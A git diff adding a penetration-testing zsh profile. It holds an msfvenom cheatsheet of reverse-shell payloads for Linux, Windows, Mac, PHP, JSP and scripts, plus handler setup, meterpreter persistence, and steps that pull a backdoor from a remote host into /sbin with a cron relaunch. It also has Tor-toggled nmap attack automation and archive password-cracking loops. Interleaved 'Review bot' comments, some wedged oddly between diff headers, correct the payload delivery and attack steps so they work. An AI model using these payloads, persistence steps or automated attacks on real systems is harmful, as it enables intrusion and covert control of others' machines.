diff --git a/.README.md.un~ b/.README.md.un~ new file mode 100755 index 0000000..2827690 Binary files /dev/null and b/.README.md.un~ differ diff --git a/LICENSE b/LICENSE old mode 100644 new mode 100755 diff --git a/README.md b/README.md old mode 100644 new mode 100755 index 447769d..7e6fcef --- a/README.md +++ b/README.md @@ -1 +1,43 @@ Penetration Tester's Zsh - functions 4 fast pawn + +Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. + +Installing after you have the dependencies: cp profile_files/.* -R ~/ + + +Functions +========= + +pawnpls - Automatically enumerate and start predefined attacks such as brute force. + Example for single target: autopawn n0nexi-stent.com + Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com" + + +everythingworksornot\? - check if everything works or not for this script + + +chk functions +============= + +chkhttpz - HTTP response check + Example: chkhttpz itsec.lu 443 + +chkcrt - SSL certificate dump + Example: chkcrt gentoo.org 443 + + +cracking functions +================== + +johnzip - Crack zip files using john + Example: johnzip data.zip rockyou.txt + +johnrar - Crack rar files using john + Example: johnrar data.rar rockyou.txt + + +help functions +============== + +hlp - Get help of the hlp command +hlprnd - Get random strings (lengths: 8,16,32,64) diff --git a/README.md~ b/README.md~ new file mode 100755 index 0000000..65aaaac --- /dev/null +++ b/README.md~ 
@@ -0,0 +1,43 @@ +Penetration Tester's Zsh - functions 4 fast pawn + +Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. + +Installing after you have the dependencies: cp profile_files/.* -R ~/ + + +Functions +========= + +pawnpls - Automatically enumerate and start predefined attacks such as brute force. + Example for single target: autopawn 127.0.0.1 + Example for multiple targets: autopawn "127.0.0.1 127.0.0.2" + + +everythingworksornot\? - check if everything works or not for this script + + +chk functions +============= + +chkhttpz - HTTP response check + Example: chkhttpz itsec.lu 443 + +chkcrt - SSL certificate dump + Example: chkcrt gentoo.org 443 + + +cracking functions +================== + +johnzip - Crack zip files using john + Example: johnzip data.zip rockyou.txt + +johnrar - Crack rar files using john + Example: johnrar data.rar rockyou.txt + + +help functions +============== + +hlp - Get help of the hlp command +hlprnd - Get random strings (lengths: 8,16,32,64) diff --git a/profile_files/.nanorc b/profile_files/.nanorc new file mode 100644 index 0000000..be95edc --- /dev/null +++ b/profile_files/.nanorc @@ -0,0 +1,6 @@ +set linenumbers +set brackets ""')>]}" +set matchbrackets "(<[{)>]}" +set nohelp +set mouse +set smooth diff --git a/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt b/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt new file mode 100644 index 0000000..95c6d72 --- /dev/null +++ b/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt 
@@ -0,0 +1,126 @@ +C0nn3ctz msfvenom payload backdoor veil + +List payloads +msfvenom -l + +# The script way to make life more simple +theip=0.0.0.0 +theport=443 + + +Binaries and libs +================= + +Linux +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf +msfvenom -p linux/x64/shell/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf + +Windows +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe +msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf +msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED +msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll +msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll +msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport + +Mac +msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f macho > shell.macho + + + +Web Payloads +============ + +PHP +msfvenom -p php/meterpreter_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.php +cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php + +ASP +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f asp > shell.asp + +JSP +msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.jsp + +WAR +msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f war > shell.war + +JavaScript +msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1 -f js_le + + + +Scripting Payloads +================== + +Python +msfvenom -p cmd/unix/reverse_python LHOST=$theip LPORT=$theport -f raw > shell.py + +Bash +msfvenom -p cmd/unix/reverse_bash LHOST=$theip LPORT=$theport -f raw > shell.sh + +Perl +msfvenom -p cmd/unix/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl # For Linux +msfvenom -p 
cmd/windows/reverse_perl=$theip LPORT=$theport -f raw > shell.pl # For Windows + + + +Shellcode +========= + +For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. + +Linux Based Shellcode +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f + +Windows Based Shellcode +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f +msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f c +msfvenom -p windows/shell/bind_tcp -f perl --smallest # Default port is 4444 and with --smallest msfvenom tries to make it small + +Mac Based Shellcode +msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f + + + +Handler +======= + +Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. + +use exploit/multi/handler +set PAYLOAD cmd/windows/powershell_reverse_tcp +set LHOST 0.0.0.0 +set LPORT 443 +set ExitOnSession false +exploit -j -z + +Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ + + + +Persistence +=========== +meterpreter > run persistence + + + +UUID Payload +============ + +# Create payload +msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=domainzz.com  LPORT=53 PayloadUUIDTracking=true PayloadUUIDName=HAXHAXHAXHAX -f elf > hipchat + +# Setup msf listener +set payload linux/x86/meterpreter/reverse_tcp_uuid +set payloadUUIDName HAXHAXHAXHAX +set PayloadUUIDTracking true +run -j  + +# Move to vict +cat hipchat.elf |ncat --ssl -lvp 53 +nc --ssl domainzz.com 53 > /sbin/lister +chmod +x /sbin/lister + +# crontab alternatively: +if ps aux|grep /sbin/hipchat |grep -v grep; then sleep 1 ; else /sbin/hipchat ; fi + 
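Review bot: The "Move to vict" steps of the UUID Payload section do not line up with each other: the payload is written to `hipchat` (`-f elf > hipchat`) but served with `cat hipchat.elf`, it is saved on the target as `/sbin/lister` yet the cron one-liner checks for and launches `/sbin/hipchat`, and `--ssl` is an ncat option rather than a plain `nc` one, so the receive side should read `ncat --ssl domainzz.com 53 > /sbin/hipchat` (or the cron line should name `/sbin/lister`). Two other entries are unusable as pasted: the Windows Perl line lost its option name and should be `msfvenom -p cmd/windows/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl`, the PHP `echo ' shell.php && pbpaste >> shell.php` line has an unbalanced quote where the opening PHP tag was presumably stripped as markup (`echo '<?php ' > shell.php && pbpaste >> shell.php`), and the three Shellcode lines ending in a bare `-f` have lost their language placeholder in the same way. Worth a comment beside the ncat transfer: in listen mode without `--ssl-cert`/`--ssl-key` ncat generates a temporary self-signed certificate and the client side does not verify it unless `--ssl-verify` is given, so this protects the binary from passive observation only.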
diff --git a/profile_files/.ptz/v3das/network_sniffing_wireshark.txt b/profile_files/.ptz/v3das/network_sniffing_wireshark.txt
new file mode 100644
index 0000000..006832d
--- /dev/null
+++ b/profile_files/.ptz/v3das/network_sniffing_wireshark.txt
@@ -0,0 +1,37 @@
+C0nn3ctz sniffing wireshark network
+
+IP address
+ip.addr == 192.168.1.1
+ip.src == 192.168.1.1
+ip.dst == 192.168.1.1
+
+Show only tcp port 110
+tcp.port eq 110
+
+Show only tcp and udp port 110
+tcp.port eq 110 || udp.port eq 110
+
+Follow TCP stream
+tcp.stream eq 0
+
+Show only TCP
+tcp
+
+Show only ARP
+arp
+
+Show only HTTP
+http
+
+Show only HTTP or ARP
+http||arp
+
+
+HTTP and ip.src
+http&&ip.src==192.168.1.4
+
+HTTP POST
+http:.request.method == "POST"
+
+etc
+(ip.addr==192.168.1.0/24) and (ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4)
diff --git a/profile_files/.vimrc b/profile_files/.vimrc
new file mode 100644
index 0000000..afdae4e
--- /dev/null
+++ b/profile_files/.vimrc
@@ -0,0 +1,4 @@
+syntax on
+set nu
+set backspace=indent,eol,start
+set tabstop=4 shiftwidth=4 expandtab
diff --git a/profile_files/.zsh/.pentest_functions.zsh.swp b/profile_files/.zsh/.pentest_functions.zsh.swp
new file mode 100644
index 0000000..a5402f9
Binary files /dev/null and b/profile_files/.zsh/.pentest_functions.zsh.swp differ
diff --git a/profile_files/.zsh/agro_detection_parser.py b/profile_files/.zsh/agro_detection_parser.py
new file mode 100644
index 0000000..021424d
--- /dev/null
+++ b/profile_files/.zsh/agro_detection_parser.py
@@ -0,0 +1,10 @@
+#!/usr/bin/python2.7
+
+with open('2_ports_and_service_top1000_on_alive_hosts.out') as f:
+ curip=""
+ for curline in f:
+ if "Nmap scan report for " in curline:
+ curip=curline
+ curip=curip[21:]
+ if "open" in curline:
+ print curip.strip('\n') + " " + curline.strip('\n')
diff --git a/profile_files/.zsh/aliases.zsh b/profile_files/.zsh/aliases.zsh
new file mode 100644
index 0000000..a0dd0e2
--- /dev/null
+++ b/profile_files/.zsh/aliases.zsh
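Review bot: `http:.request.method == "POST"` is not a valid display filter — the field is `http.request.method` — so the HTTP POST entry should read `http.request.method == "POST"`. A caveat worth adding beside the last filter: `!=` applied to a field that can occur more than once in a packet (`ip.addr`, and `ip.src`/`ip.dst` when an ICMP error carries an inner IP header) means "any occurrence differs" in Wireshark releases before 3.6, so `!(ip.src==192.168.1.2)` is the version-independent way to exclude a host.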
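Review bot: The parser is Python 2 only (`#!/usr/bin/python2.7` and a `print` statement), but pentest_functions.zsh runs it as `python ~/.zsh/agro_detection_parser.py`; on current Kali/Debian releases `python` is Python 3 or absent, the `print` line is then a SyntaxError, and the scan pipeline quietly produces an empty `3_ip_port_service.out`. Changing the last line to `print(curip.strip('\n') + " " + curline.strip('\n'))` and the shebang to `#!/usr/bin/env python3` makes it run under both interpreters. The input file name is hard-coded and opened relative to the current directory, so the script only works when invoked from the scan's result directory; taking the path as `sys.argv[1]` with the current name as the default would make that dependence explicit. `curip[21:]` relies on the literal prefix `"Nmap scan report for "` being exactly 21 characters; `curline.split("for ", 1)[1]` expresses the same intent without the magic number.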
@@ -0,0 +1,2 @@
+alias py='python'
+alias pl='perl'
diff --git a/profile_files/.zsh/bindkeys.zsh b/profile_files/.zsh/bindkeys.zsh
new file mode 100644
index 0000000..3069983
--- /dev/null
+++ b/profile_files/.zsh/bindkeys.zsh
@@ -0,0 +1,13 @@
+bindkey "^K" kill-whole-line
+
+bindkey "${terminfo[khome]}" beginning-of-line
+bindkey "${terminfo[kend]}" end-of-line
+bindkey "\e[3~" delete-char
+
+bindkey -v
+bindkey '^R' history-incremental-search-backward
+bindkey '^T' history-incremental-search-backward
+
+# Jumping with ctrl+arrows
+bindkey "^[[1;5C" forward-word
+bindkey "^[[1;5D" backward-word
diff --git a/profile_files/.zsh/colors.zsh b/profile_files/.zsh/colors.zsh
new file mode 100644
index 0000000..8267050
--- /dev/null
+++ b/profile_files/.zsh/colors.zsh
@@ -0,0 +1,17 @@
+autoload colors; colors
+
+# The variables are wrapped in %{%}. This should be the case for every variable that does not contain space.
+for COLOR in RED GREEN YELLOW BLUE MAGENTA CYAN BLACK WHITE; do
+ eval PR_$COLOR='%{$fg_no_bold[${(L)COLOR}]%}'
+ eval PR_BOLD_$COLOR='%{$fg_bold[${(L)COLOR}]%}'
+done
+
+eval RESET='$reset_color'
+export PR_RED PR_GREEN PR_YELLOW PR_BLUE PR_WHITE PR_BLACK
+export PR_BOLD_RED PR_BOLD_GREEN PR_BOLD_YELLOW PR_BOLD_BLUE
+export PR_BOLD_WHITE PR_BOLD_BLACK
+
+# Clear LSCOLORS
+unset LSCOLORS
+export CLICOLOR=1
+export LS_COLORS=exfxcxdxbxegedabagacad
diff --git a/profile_files/.zsh/completion.zsh b/profile_files/.zsh/completion.zsh
new file mode 100644
index 0000000..6fe6d5f
--- /dev/null
+++ b/profile_files/.zsh/completion.zsh
@@ -0,0 +1,2 @@
+autoload -U compinit && compinit
+zmodload -i zsh/complist
diff --git a/profile_files/.zsh/general_functions.zsh b/profile_files/.zsh/general_functions.zsh
new file mode 100644
index 0000000..febd4bd
--- /dev/null
+++ b/profile_files/.zsh/general_functions.zsh
@@ -0,0 +1,22 @@
+function extract {
+ echo Running extract on $1 ...
+ if [ -f $1 ] ; then
+ case $1 in
+ *.tar.bz2) tar xjf $1 ;;
+ *.tar.gz) tar xzf $1 ;;
+ *.bz2) bunzip2 $1 ;;
+ *.rar) unrar x $1 ;;
+ *.gz) gunzip $1 ;;
+ *.tar) tar xf $1 ;;
+ *.tbz2) tar xjf $1 ;;
+ *.tgz) tar xzf $1 ;;
+ *.zip) unzip $1 ;;
+ *.Z) uncompress $1 ;;
+ *.7z) 7z x $1 ;;
+ *.xz) unxz $1 ;;
+ *) echo "'$1' cannot be extracted via extract()" ;;
+ esac
+ else
+ echo "'$1' is not a valid file"
+ fi
+}
diff --git a/profile_files/.zsh/history.zsh b/profile_files/.zsh/history.zsh
new file mode 100644
index 0000000..1e38ca6
--- /dev/null
+++ b/profile_files/.zsh/history.zsh
@@ -0,0 +1 @@
+# Not saving history by default
diff --git a/profile_files/.zsh/pentest_functions.zsh b/profile_files/.zsh/pentest_functions.zsh
new file mode 100644
index 0000000..86f549d
--- /dev/null
+++ b/profile_files/.zsh/pentest_functions.zsh
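Review bot: Every `$1` in `extract` is unquoted, so an archive path containing a space or a glob character is split or expanded before `[ -f $1 ]` and the extractor run; `if [[ -f "$1" ]]; then`, `case "$1" in` and `"$1"` in each branch (with `--` in front of it for names that begin with `-`) close that. The fallback `cannot be extracted via extract()` and the `is not a valid file` branch both leave the function with status 0, so a caller cannot tell the failure apart from success; a `return 1` in each would. Since this profile is meant for handling files pulled off engagement targets, a comment that the archive is unpacked into the current directory, relying on `tar`/`unzip`'s own stripping of `..` and absolute members rather than any check here, would be worth adding above the `case`.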
@@ -0,0 +1,200 @@ +function everythingworksornot"?" { + echo "really?" +} + +function ton { + . torsocks on +} + +function tof { + . torsocks off +} + + +function chkhttpz { + echo "HTTP responses" + wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/" + + echo "\nHTTPS responses" + wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/" +} + + +function chkcrt { + openssl s_client -showcerts -connect $1:$2 +} + + +function hlp { + echo "You can get help from the following topics:" + for f in ~/.ptz/v3das/* ; do + echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1 + done +} + +function hlprnd { + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-64};echo; +} + + +function johnzip { + if [ $# -ne 2 ] + then + echo "Usage $0 " + return + fi + + echo "Unzip test..." + unzip -l $1 + + echo "Cracking...." + for i in $(john --wordlist=$2 --rules --stdout) + do + echo -ne "\rtrying \"$i\" " + unzip -o -P $i $1 >/dev/null 2>&1 + STATUS=$? + if [ $STATUS -eq 0 ]; then + echo -e "\nArchive password is: \"$i\"" + return + fi + done +} + + +function johnrar { + if [ $# -ne 2 ] + then + echo "Usage $0 " + else + rar l $1 + echo "Cracking...." + john --wordlist=$2 --rules --stdout | while read i + do + echo -ne "\rtrying \"$i\" " + rar e -o+ -inul -p$i $1 >/dev/null + STATUS=$? + if [ $STATUS -eq "0" ]; then + echo -e "\nArchive password is: \"$i\"" + return + fi + done + fi +} + + + +function pawnpls { + amir00t=$(whoami) + if [ "$amir00t" != "root" ] + then + echo "pawnpls needs root in order to be effective (eg. for nmap -sS scans)." + return + fi + + if [ $# -ne 1 ] + then + echo "Are you sure? You need to specify a target. Be careful. 
This runs out of tor also, even if you have torsocks ;)" + return + fi + + # Pass to the scan function, no active attacks, just scanning + pawnpls_tof_target=$1 + dns_enum_tof + scan_enum_tof + active_attack_tof + +} + + +function dns_enum_tof { + + . torsocks off + + dnstarg=($pawnpls_tof_target) + + cdate=$(date +"%Y-%m-%d-%H%M") + dettmpfold="~/.ptz/result-scan-$cdate" + mkdir -p $sctmpfold + cd $sctmpfold + + theharvester -d $pawnpls_tof_target -b all -v > 1_harvester_$pawnpls_tof_target.txt + +} + +function scan_enum_tof { + + . torsocks off + + # Variables + targetx=($pawnpls_tof_target) # Space delimited! + ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211) + + # Initialize directory and naming structure + cdate=$(date +"%Y-%m-%d-%H%M") + sctmpfold="~/.ptz/result-scan-$cdate" + mkdir -p $sctmpfold + cd $sctmpfold + + touch scan_history.txt + + echo "---- Starting AgroScanner ----" >> scan_history.txt + + # Start with standard alive scan and check ports on alive hosts + # Get alive hosts + echo "Starting alive host enumeration..." + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt + nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out + alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ') + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt + + echo "Starting port scans on alive hosts..." + # Port scanning on alive hosts and version detection + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." 
>> scan_history.txt + nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out + python ~/.zsh/agro_detection_parser.py | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out + number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this. + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt + # Run UDP scan on most common ports + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt + nmap -sU --top-ports 50 $targetx > 4_udpscan.out + number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l) + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt + + echo "Starting nmap nse vulnerability scanning..." + # Vulnerability scanning + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt + nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt + nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something + nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt + + echo $(date +"%Y-%m-%d-%H-%M-%S") " Started scan for automatic searchsploit." >> scan_history.txt + # for searchsploit, but nmap should be configured to scan with xml, default is top 1000 + nmap -sS -sV -sC -O --host-timeout=5m --max-hostgroup=1 -Pn $targetx -oA 8_nmap_for_searchsploit + searchsploit -v --nmap 8_nmap_for_searchsploit.xml > 9_searchslpoit_results.txt + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished the searchsploit queries. 
Outputs are in the relevant files." >> scan_history.txt
+
+}
diff --git a/profile_files/.zsh/prompt.zsh b/profile_files/.zsh/prompt.zsh
new file mode 100644
index 0000000..fc35679
--- /dev/null
+++ b/profile_files/.zsh/prompt.zsh
@@ -0,0 +1,37 @@
+function git_prompt_info {
+ local ref=$(=git symbolic-ref HEAD 2> /dev/null)
+ local gitst="$(=git status 2> /dev/null)"
+
+ if [[ -f .git/MERGE_HEAD ]]; then
+ if [[ ${gitst} =~ "unmerged" ]]; then
+ gitstatus=" %{$fg[red]%}unmerged%{$reset_color%}"
+ else
+ gitstatus=" %{$fg[green]%}merged%{$reset_color%}"
+ fi
+ elif [[ ${gitst} =~ "Changes to be committed" ]]; then
+ gitstatus=" %{$fg[blue]%}!%{$reset_color%}"
+ elif [[ ${gitst} =~ "use \"git add" ]]; then
+ gitstatus=" %{$fg[red]%}!%{$reset_color%}"
+ elif [[ -n `git checkout HEAD 2> /dev/null | grep ahead` ]]; then
+ gitstatus=" %{$fg[yellow]%}*%{$reset_color%}"
+ else
+ gitstatus=''
+ fi
+
+ if [[ -n $ref ]]; then
+ echo "%{$fg_bold[green]%}/${ref#refs/heads/}%{$reset_color%}$gitstatus"
+ fi
+}
+
+function trso {
+ trsochk=$(/usr/bin/torsocks show|grep libtorsocks.so)
+ if [[ -z $(/usr/bin/torsocks show|grep libtorsocks.so) ]]
+ then
+ trchkres="%{$fg[yellow]%}tof"
+ else
+ trchkres="%{$fg[red]%}ton"
+ fi
+ echo $trchkres
+}
+
+PROMPT='%{$fg[red]%}$(whoami)%{$reset_color%}.ptz $(trso)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} '
diff --git a/profile_files/.zsh/setopt.zsh b/profile_files/.zsh/setopt.zsh
new file mode 100644
index 0000000..4b865a7
--- /dev/null
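Review bot: dns_enum_tof, scan_enum_tof and active_attack_tof each begin with `. torsocks off`, which un-torifies the whole interactive shell (the .zshrc in this commit sources `torsocks on` at startup) and nothing switches it back on when pawnpls returns, so every command typed afterwards leaves Tor silently; pawnpls should end with `. torsocks on` (or save and restore the state that `trso` reports). The result directories are broken as well: `"~/.ptz/result-scan-$cdate"` is double-quoted, so `~` is not expanded and a literal `~` directory is created under the current directory, dns_enum_tof assigns `dettmpfold` but then uses the unset `$sctmpfold`, so its `mkdir -p` runs with no argument and `cd` drops into `$HOME`, and no `cd` is followed by `|| return`, so the nmap output lands wherever the shell happens to be. Multi-target use as the README describes (`"a b"` passed as one argument) does not work either, because zsh does not word-split `$pawnpls_tof_target` in `targetx=($pawnpls_tof_target)` — `${=pawnpls_tof_target}` is the explicit split — and the unquoted `--script smb-enum-*` is a glob that zsh rejects with "no matches found", so that nmap line never runs. Separately, johnzip and johnrar pass every candidate on the command line (`-P $i`, `-p$i`), which other users can read from `ps`, and `unzip -o` extracts the archive into the working directory on a hit where `unzip -t` would only verify the password.
```shell
function pawnpls {
    # … unchanged: root and argument checks …
    pawnpls_tof_target=$1
    dns_enum_tof
    scan_enum_tof
    active_attack_tof
    . torsocks on   # restore the torified default the .zshrc sets up
}

function scan_enum_tof {
    . torsocks off
    targetx=(${=pawnpls_tof_target})   # explicit word split: zsh does not split $var on its own
    # … unchanged: ports list …
    cdate=$(date +"%Y-%m-%d-%H%M")
    sctmpfold="$HOME/.ptz/result-scan-$cdate"   # ~ is not expanded inside double quotes
    mkdir -p -- "$sctmpfold" || return 1
    cd -- "$sctmpfold" || return 1
    # … unchanged: alive-host, top-1000 and UDP scans …
    nmap -sU -sS --script 'smb-enum-*' -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt
    # … unchanged: default/safe/vuln scan and searchsploit …
}
```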
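Review bot: `git_prompt_info` runs `git checkout HEAD` on every prompt, apparently only to grep "ahead" out of its tracking message; that is a working-tree command used as a status query, executed in whatever repository the shell is in, and `git status -sb 2> /dev/null | grep -q ahead` (or `git rev-list --count @{u}..HEAD`) answers the same question without touching the tree. In `trso`, `trsochk` is assigned and never read while the identical `/usr/bin/torsocks show | grep` pipeline is run a second time inside the `if`; testing `[[ -z $trsochk ]]` instead halves the forks per prompt. `git status` is also run before `$ref` is checked, so it is invoked even outside a repository; moving the `[[ -n $ref ]]` guard to the top avoids that.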
+++ b/profile_files/.zsh/setopt.zsh
@@ -0,0 +1,4 @@
+setopt AUTO_CD
+setopt COMPLETE_IN_WORD
+setopt ALWAYS_TO_END
+setopt PROMPT_SUBST
diff --git a/profile_files/.zshrc b/profile_files/.zshrc
new file mode 100644
index 0000000..45b0ff2
--- /dev/null
+++ b/profile_files/.zshrc
@@ -0,0 +1,14 @@
+source ~/.zsh/colors.zsh
+source ~/.zsh/setopt.zsh
+source ~/.zsh/prompt.zsh
+source ~/.zsh/completion.zsh
+source ~/.zsh/aliases.zsh
+source ~/.zsh/bindkeys.zsh
+source ~/.zsh/functions.zsh
+source ~/.zsh/general_functions.zsh
+source ~/.zsh/pentest_functions.zsh
+source ~/.zsh/history.zsh
+
+zstyle ':completion:*' menu select
+
+. torsocks on
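Review bot: `source ~/.zsh/functions.zsh` names a file that does not appear anywhere in this diff (the .zsh directory it adds holds aliases, bindkeys, colors, completion, general_functions, history, pentest_functions, prompt and setopt), so every new shell would start with a "no such file or directory" error; drop the line or guard it with `[[ -r ~/.zsh/functions.zsh ]] && source ~/.zsh/functions.zsh`. The closing `. torsocks on` is unconditional, so on a host without torsocks it errors at every startup; `command -v torsocks >/dev/null && . torsocks on` is safer, ideally with a comment saying this is the torified-by-default baseline that the pawnpls helpers in pentest_functions.zsh switch off.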